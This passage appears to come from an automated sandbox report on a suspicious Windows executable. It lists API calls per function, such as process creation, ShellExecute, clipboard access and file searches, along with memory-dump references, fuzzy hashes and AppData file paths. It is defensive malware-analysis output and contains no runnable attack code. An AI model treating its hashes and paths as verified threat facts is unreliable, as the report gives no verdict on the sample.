                                                  • SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                  • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                  • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                  • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                  Function 0040332B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                  • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                  • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                  • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                  Function 004058AA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteExW.SHELL32(?), ref: 004058B9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ExecuteShell
                                                  • String ID:
                                                  • API String ID: 587946157-0
                                                  • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                  • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                  • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                  • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                  Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                    • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                    • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                    • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                    • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                    • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                    • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                    • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                    • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 2972824698-0
                                                  • Opcode ID: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                  • Instruction ID: 0c3abe8747980e4b1c062509ec269ea7acbc1ace6387f940061889d1bd78c20b
                                                  • Opcode Fuzzy Hash: a0367c61fa75c7fa1ed8603c7bcbb816b6d25ff725675df51efd44c1739e69f8
                                                  • Instruction Fuzzy Hash: F5F09032905115DBCB20FFA19D848DE62A49F01368B25057FF102F61D1C77C0E459AAE
                                                  Function 1000101B Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,10001019,00000001), ref: 1000102F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
                                                  • Opcode ID: e75efe14272d739486d1db974dc6e9717b1eaf87509b7cdf2a82d93b2c2872d6
                                                  • Instruction ID: e5c3751ad1220250e74be9454f066420c3e0eb8c37b3bb25f91e25635540fedc
                                                  • Opcode Fuzzy Hash: e75efe14272d739486d1db974dc6e9717b1eaf87509b7cdf2a82d93b2c2872d6
                                                  • Instruction Fuzzy Hash: 29C08CA5001282F9F110C3B08D0AF9F22ACCB881D2F104400FA93C908CDAB0D7801630
                                                  Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
                                                  • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                  • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                  • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                  • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

                                                  Non-executed Functions

                                                  Function 00405425 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                  • GetClientRect.USER32(?,?), ref: 004054CF
                                                  • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                  • ShowWindow.USER32(?,00000008), ref: 00405572
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                    • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                  • CloseHandle.KERNEL32(00000000), ref: 004055FA
                                                  • ShowWindow.USER32(00000000), ref: 0040561E
                                                  • ShowWindow.USER32(?,00000008), ref: 00405623
                                                  • ShowWindow.USER32(00000008), ref: 0040566D
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                  • CreatePopupMenu.USER32 ref: 004056B2
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                  • GetWindowRect.USER32(?,?), ref: 004056E6
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                  • OpenClipboard.USER32(00000000), ref: 00405747
                                                  • EmptyClipboard.USER32 ref: 0040574D
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                  • CloseClipboard.USER32 ref: 004057A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 590372296-366298937
                                                  • Opcode ID: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                  • Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
                                                  • Opcode Fuzzy Hash: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                  • Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68
                                                  Function 004046E6 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404735
                                                  • SetWindowTextW.USER32(00000000,?), ref: 0040475F
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404810
                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040481B
                                                  • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 0040484D
                                                  • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040486B
                                                    • Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB
                                                    • Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                    • Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                    • Part of subcall function 00406516: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                    • Part of subcall function 00406516: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                  • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040492E
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404949
                                                    • Part of subcall function 00404AA2: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B43
                                                    • Part of subcall function 00404AA2: wsprintfW.USER32 ref: 00404B4C
                                                    • Part of subcall function 00404AA2: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call
                                                  • API String ID: 2624150263-251418098
                                                  • Opcode ID: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                  • Instruction ID: b9cd804fa769b9c0a994065299bacf789a546679ae48146ccc486c737bfd155f
                                                  • Opcode Fuzzy Hash: 2bf24cd5b38970458feb5e26e62e94a42910e0745c64cb7450705bda54c983ff
                                                  • Instruction Fuzzy Hash: CBA175F1A00209ABDB11AFA5CD41AAFB7B8EF84354F10847BF601B62D1D77C99418B6D
                                                  Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                  • GlobalFree.KERNEL32(?), ref: 10001D83
                                                  • GlobalFree.KERNEL32(?), ref: 10001D88
                                                  • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                  • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc
                                                  • String ID:
                                                  • API String ID: 4227406936-0
                                                  • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                  • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                  • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                  • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                  Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular, xrefs: 004021BD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular
                                                  • API String ID: 542301482-3139891972
                                                  • Opcode ID: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                  • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                  • Opcode Fuzzy Hash: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                  • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                  Function 004072B4 Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: p!C$p!C
                                                  • API String ID: 0-3125587631
                                                  • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                  • Instruction ID: ef217add9e462a39eaf01b2cd615f348b30b4b8a27c4232395f9688b09cd85c2
                                                  • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                  • Instruction Fuzzy Hash: 33C15831E04219DBDF18CF68C8905EEBBB2BF88314F25826AD85677380D734A942CF95
                                                  Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402871
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                  • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                  • Opcode Fuzzy Hash: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                  • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                  Function 00406ADD Relevance: .3, Instructions: 334COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
